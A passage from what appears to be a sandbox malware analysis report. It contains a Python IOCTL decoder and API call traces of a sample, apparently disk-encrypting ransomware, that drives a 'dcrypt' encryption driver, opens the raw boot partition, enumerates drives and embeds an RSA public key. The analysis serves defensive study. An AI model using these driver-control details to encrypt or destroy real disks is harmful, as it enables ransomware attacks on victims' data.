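                0x12: 'FILE_DEVICE_NETWORK', 0x22: 'FILE_DEVICE_UNKNOWN'}


def ctl_code(device_type, function, method, access):
    """Python port of the CTL_CODE macro."""
    if not (0 <= function <= 0xFFF and 0 <= method <= 3 and 0 <= access <= 3):
        raise ValueError('CTL_CODE field out of range')
    return ((device_type & 0xFFFF) << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a control code into its CTL_CODE fields."""
    dev = (code >> 16) & 0xFFFF
    return {
        'device_type': dev,
        'device_name': DEVICE_TYPES.get(dev, 'vendor-defined' if dev >= 0x8000 else 'other'),
        'access': ACCESS[(code >> 14) & 0x3],
        'function': (code >> 2) & 0xFFF,
        'method': METHODS[code & 0x3],
    }


# Control codes this listing passes to DeviceIoControl on the \\.\dcrypt handle
DCRYPT_IOCTLS = (0x220020, 0x220038, 0x22003C, 0x220060)


def summarize(codes):
    """One (code, device_name, function, method, access) tuple per code."""
    rows = []
    for code in codes:
        d = decode_ioctl(code)
        rows.append((code, d['device_name'], d['function'], d['method'], d['access']))
    return rows


if __name__ == '__main__':
    for code, dev, fn, method, access in summarize(DCRYPT_IOCTLS):
        print('0x%08X  %-20s function=0x%03X  %s  %s' % (code, dev, fn, method, access))
```

All four codes decode to FILE_DEVICE_UNKNOWN, METHOD_BUFFERED and FILE_ANY_ACCESS with function numbers 0x8, 0xE, 0xF and 0x18. FILE_ANY_ACCESS is consistent with the CreateFileW call in the listing, which opens `\\.\dcrypt` with a desired-access mask of 0: the driver's control interface does not require read or write rights on the handle, so any process that can open the device name can issue these requests.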
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5C0F
                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00DF5C78
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: DirectorySystem$AppendCreateEnvironmentPathProcessVariablelstrcat
                                                                      • String ID: $ $ $.$/$d$f$r$s$u$w$x
                                                                      • API String ID: 1581931562-2588986813
                                                                      • Opcode ID: 083c52a335cfe8b256cc811d4b924a1c3696e440dba0ff839ebc14c8139e27eb
                                                                      • Instruction ID: aecc69a298ee61453e59789a3465cd9be6f47541240c3f27657f57c6a74167a8
                                                                      • Opcode Fuzzy Hash: 083c52a335cfe8b256cc811d4b924a1c3696e440dba0ff839ebc14c8139e27eb
                                                                      • Instruction Fuzzy Hash: 30110CB0D0130C9BDB00DFA1E8597EEBBB6EB08748F008158D6056A255D7B69A5CCFA4
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF235D
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF2370
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2388
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF239D
                                                                      • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF23B9
                                                                      • GetLastError.KERNEL32 ref: 00DF23C3
                                                                      • VirtualLock.KERNEL32(?,00000298), ref: 00DF23D6
                                                                      • TlsGetValue.KERNEL32(?,00220028,?,00000298,?,00000298,?,00000000), ref: 00DF2440
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF2447
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 233298530-1945893055
                                                                      • Opcode ID: ccc5ed0e62239ec2e69dfee299814bdfb6367bd928b7fddc9ccec1648049325a
                                                                      • Instruction ID: 26ec518be5b90c6cf8593dfee2874a14cde942375e2f10e0c4d053e647cc7e79
                                                                      • Opcode Fuzzy Hash: ccc5ed0e62239ec2e69dfee299814bdfb6367bd928b7fddc9ccec1648049325a
                                                                      • Instruction Fuzzy Hash: 2B31E3B5A41309AFEB109BA1DC49FBB776CEB44710F058114FE08BB2D0DAB59D4487B0
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF248D
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF24A0
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF24B8
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF24CD
                                                                      • DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF24E9
                                                                      • GetLastError.KERNEL32 ref: 00DF24F3
                                                                      • VirtualLock.KERNEL32(?,00000298), ref: 00DF2506
                                                                      • TlsGetValue.KERNEL32(?,0022002C,?,00000298,?,00000298,?,00000000), ref: 00DF256B
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF2572
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlDeviceVirtual$AllocCreateErrorFileLastLock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 233298530-1945893055
                                                                      • Opcode ID: 8876583cf705001cc4616464b1af07b7b5a161b522834c49b68299348bfb8d51
                                                                      • Instruction ID: 38f9a9bfc6d2f461569be86bd855fe7e58261b7eb6d25f59bb74a69196342361
                                                                      • Opcode Fuzzy Hash: 8876583cf705001cc4616464b1af07b7b5a161b522834c49b68299348bfb8d51
                                                                      • Instruction Fuzzy Hash: F7319275A41319BFEB108BA59C49FBB776CEB45711F098114FE04BB2C0DA75DE4487A0
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00DF135A
                                                                      • GetSystemDefaultLCID.KERNEL32 ref: 00DF1375
                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 00DF1385
                                                                      • _memmove.LIBCMT ref: 00DF139F
                                                                      • NetWkstaGetInfo.NETAPI32(00E04ED4,00000064,?), ref: 00DF13BD
                                                                      • _memmove.LIBCMT ref: 00DF1436
                                                                      • _memmove.LIBCMT ref: 00DF1467
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00DF14C4
                                                                      • _memmove.LIBCMT ref: 00DF14EF
                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF154F
                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF156A
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Local_memmove$AllocFree$DefaultInfoInformationSystemTimeWkstaZone
                                                                      • String ID:
                                                                      • API String ID: 605661058-0
                                                                      • Opcode ID: ef79cfc930e34d7b95084db8be5e237234addf783ab125f41967e043e88b4765
                                                                      • Instruction ID: 8b92bf815125ba79c3e6f1de4790144e3a8663224d0f363388a6b73e536fa400
                                                                      • Opcode Fuzzy Hash: ef79cfc930e34d7b95084db8be5e237234addf783ab125f41967e043e88b4765
                                                                      • Instruction Fuzzy Hash: BC71B275A00219DBDB20DF68DC84BAAB7B5EF44310F09C299EA0997251DB30DE84CBA1
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00DF35FA
                                                                      • CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00DF2DD3), ref: 00DF3616
                                                                      • DeviceIoControl.KERNEL32(00000000,00070048,00000000,00000000,?,00000090,?,00000000), ref: 00DF3666
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1080,00000000,00000000,?,0000000C,?,00000000), ref: 00DF36A3
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00DF2DD3), ref: 00DF3802
                                                                      Strings
                                                                      • \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1), xrefs: 00DF3611
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDevice$CloseCreateFileHandle_memset
                                                                      • String ID: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
                                                                      • API String ID: 2416907234-457416688
                                                                      • Opcode ID: b0563792646fe73b11008aab6a72648123e19a51af73e577f9d581e7729c2396
                                                                      • Instruction ID: f8c22acd097b8ef1634584f58c1f189ecc154303fec05a362edb4c8ee1c39236
                                                                      • Opcode Fuzzy Hash: b0563792646fe73b11008aab6a72648123e19a51af73e577f9d581e7729c2396
                                                                      • Instruction Fuzzy Hash: 39618775A40314ABE730DF54DC41BAAB7F8EF48750F118559E689E72C0D7B0AE848BA4
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00DF2463,?), ref: 00DF382D
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00DF2463,?), ref: 00DF3845
                                                                      • TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00DF2463,?), ref: 00DF385A
                                                                      • DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00DF3876
                                                                      • GetLastError.KERNEL32(?,?,?,?,00DF2463,?), ref: 00DF3880
                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00DF2463,?), ref: 00DF3894
                                                                      • VirtualUnlock.KERNEL32(?,?,?,?,?,?,00DF2463,?), ref: 00DF38C2
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00DF2463,?), ref: 00DF38D3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Value$ControlCreateDeviceErrorFileFreeLastQueryUnlock
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 78819294-1945893055
                                                                      • Opcode ID: b5885f972e987c2b1a3da61d0a5dfc4a69dfc9a51571ed71467ebfa8a85f8575
                                                                      • Instruction ID: f68f9ef7bb673ada1f43dd2ff50bf51d5fbb1484effc632cfbe494d87a712aa9
                                                                      • Opcode Fuzzy Hash: b5885f972e987c2b1a3da61d0a5dfc4a69dfc9a51571ed71467ebfa8a85f8575
                                                                      • Instruction Fuzzy Hash: 1C216271A41219BFEB209BA9DC49FBA376CEB08791F068105FA05F6190D7759E488BB0
                                                                      APIs
                                                                      • GetLogicalDrives.KERNEL32 ref: 00DF1F43
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00DF1F88
                                                                      • LocalAlloc.KERNEL32(00000040,00000050), ref: 00DF1F97
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001E40,00000000,00000000,00000000), ref: 00DF1FDC
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00DF1FE7
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1FEE
                                                                      Strings
                                                                      • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00DF1FB0
                                                                      • :, xrefs: 00DF1F7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCloseCreateDriveDrivesHandleLocalLogicalObjectSingleThreadTypeWait
                                                                      • String ID: :$MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                                                      • API String ID: 3841114299-3934174110
                                                                      • Opcode ID: 70944d357acaabba2ef15436c96956f88345571ec6c2ad603d0da6692d9b219f
                                                                      • Instruction ID: 3a6dd46a3d3612e4632c569b90827a67b1a5b965800daac53a6631494a65985f
                                                                      • Opcode Fuzzy Hash: 70944d357acaabba2ef15436c96956f88345571ec6c2ad603d0da6692d9b219f
                                                                      • Instruction Fuzzy Hash: CC21AC75A01209EFDB00DF65CC44BAEBBB4FF49310F058169EA15BB390CB719A08CBA0
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44AA
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44BD
                                                                      • GetProcessHeap.KERNEL32(00000000,00000001,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D0
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44D7
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF44F3
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4504
                                                                      • HeapFree.KERNEL32(00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF450B
                                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4513
                                                                      • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF4535
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$File$CloseHandleProcess$AllocCreateFreeReadSize
                                                                      • String ID:
                                                                      • API String ID: 2825476172-0
                                                                      • Opcode ID: f63e1a195c795f3d78ee5473898ecdb1b19735ac4d34fb7cbad098955eff378a
                                                                      • Instruction ID: 67df3479a26ffd82a66c8ed4d35b51ad34dbfc4ed20bdeaae12ec585155fa2b8
                                                                      • Opcode Fuzzy Hash: f63e1a195c795f3d78ee5473898ecdb1b19735ac4d34fb7cbad098955eff378a
                                                                      • Instruction Fuzzy Hash: C1216675601214BFC7209BBAEC4CFAFBF7CEB49762F144146FA09E3250D6728A44C6A0
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF20BD
                                                                      • _wcschr.LIBCMT ref: 00DF20C8
                                                                      • _wcschr.LIBCMT ref: 00DF20F8
                                                                      • __snwprintf.LIBCMT ref: 00DF210C
                                                                      • DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF213D
                                                                      • DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00DF2196
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDevice_wcschr$Value__snwprintf
                                                                      • String ID: \??\Volume%s
                                                                      • API String ID: 2726058786-4071929160
                                                                      • Opcode ID: b4908c17801f6de36a9f92562e7220a34ae02d96730b492aeabbaeeaacbb1766
                                                                      • Instruction ID: cd8dd47ef51fede139e374a38800a3c869fcf84f80f8c9f49fcd77c437933f35
                                                                      • Opcode Fuzzy Hash: b4908c17801f6de36a9f92562e7220a34ae02d96730b492aeabbaeeaacbb1766
                                                                      • Instruction Fuzzy Hash: D331D331A00308AEDB20DB64DC46FBAB378EF49710F458159F60A97195EEB49E84CBB5
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF3BFA
                                                                      • _malloc.LIBCMT ref: 00DF3C40
                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3C63
                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3C88
                                                                      • _memmove.LIBCMT ref: 00DF3CA6
                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00DF3CBB
                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 00DF3CD7
                                                                      • _free.LIBCMT ref: 00DF3CEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ReadWrite__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2931023824-0
                                                                      • Opcode ID: 666caf86ab6795251c5ee3d76c1ece564036c5aaffb5a70b7be19d50e1fab9a3
                                                                      • Instruction ID: 886ef606197c5880b4a4a248ea9d1c2551d1a695f369cea81de65c84782edeb4
                                                                      • Opcode Fuzzy Hash: 666caf86ab6795251c5ee3d76c1ece564036c5aaffb5a70b7be19d50e1fab9a3
                                                                      • Instruction Fuzzy Hash: 7F417076A00219ABCB10CF65CC85EAA7B69EB85750F168219FE09AB244D630EA44C7F1
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF2E65
                                                                      • _malloc.LIBCMT ref: 00DF2EB6
                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000000), ref: 00DF2EDE
                                                                      • ReadFile.KERNEL32(?,00000000,-00000200,?,00000000,?,00000000,?,00000000), ref: 00DF2F01
                                                                      • _memmove.LIBCMT ref: 00DF2F29
                                                                      • _free.LIBCMT ref: 00DF2F35
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2967271196-0
                                                                      • Opcode ID: 37356f3e9132765c2b211aa8c9d23ee30dda9f79eb02aae53676949d3d37f84c
                                                                      • Instruction ID: 547767384e391844d4f8ee291b12e3e14f7cef1e6f2850174c70b80d81ad63a7
                                                                      • Opcode Fuzzy Hash: 37356f3e9132765c2b211aa8c9d23ee30dda9f79eb02aae53676949d3d37f84c
                                                                      • Instruction Fuzzy Hash: 7A418371E1011CAFDB14CF59D884ABAB7B9EF84320F19C16AFD199B791E6349E4087A0
                                                                      APIs
                                                                      • __aullrem.LIBCMT ref: 00DF3B0A
                                                                      • _malloc.LIBCMT ref: 00DF3B50
                                                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF3B73
                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,00000000,00000000,00000000,?,00000000), ref: 00DF3B93
                                                                      • _memmove.LIBCMT ref: 00DF3BBC
                                                                      • _free.LIBCMT ref: 00DF3BC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$PointerRead__aullrem_free_malloc_memmove
                                                                      • String ID:
                                                                      • API String ID: 2967271196-0
                                                                      • Opcode ID: 90e5320d93a62b27c918aff5e344703ccdb13fe34b207076662c9fb7200ea8e5
                                                                      • Instruction ID: cf20fee242445a90a2ba261ceec78cca301a78b411f21e6e6153112c036eaa7c
                                                                      • Opcode Fuzzy Hash: 90e5320d93a62b27c918aff5e344703ccdb13fe34b207076662c9fb7200ea8e5
                                                                      • Instruction Fuzzy Hash: 2E31B7B6A00219ABCB10DF69DC809AA77B9EF94310F16C269FE159B340D630EE04C7F0
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DF9718
                                                                        • Part of subcall function 00DFA0B6: __getptd_noexit.LIBCMT ref: 00DFA0B9
                                                                        • Part of subcall function 00DFA0B6: __amsg_exit.LIBCMT ref: 00DFA0C6
                                                                      • __amsg_exit.LIBCMT ref: 00DF9738
                                                                      • __lock.LIBCMT ref: 00DF9748
                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00DF9765
                                                                      • _free.LIBCMT ref: 00DF9778
                                                                      • InterlockedIncrement.KERNEL32(014517F0), ref: 00DF9790
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                      • String ID:
                                                                      • API String ID: 3470314060-0
                                                                      • Opcode ID: 92166f1290194b64cf0f1d8630035f717945f573298a88e5f1129fa6a626bb6b
                                                                      • Instruction ID: 30fee6c81a9e851add53e0fea4a6ec793734d2b49fb17eb313d76283fee46890
                                                                      • Opcode Fuzzy Hash: 92166f1290194b64cf0f1d8630035f717945f573298a88e5f1129fa6a626bb6b
                                                                      • Instruction Fuzzy Hash: A501C031D15B199BC711BF6AA94677EF360AF04720F1AC006FA44B7291CB745A85CBF2
                                                                      APIs
                                                                        • Part of subcall function 00DF5910: GetLocalTime.KERNEL32(?), ref: 00DF592B
                                                                        • Part of subcall function 00DF5910: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF593F
                                                                        • Part of subcall function 00DF5910: FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF5979
                                                                        • Part of subcall function 00DF5910: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF598B
                                                                        • Part of subcall function 00DF5910: PathAppendW.SHLWAPI(?,?), ref: 00DF59F8
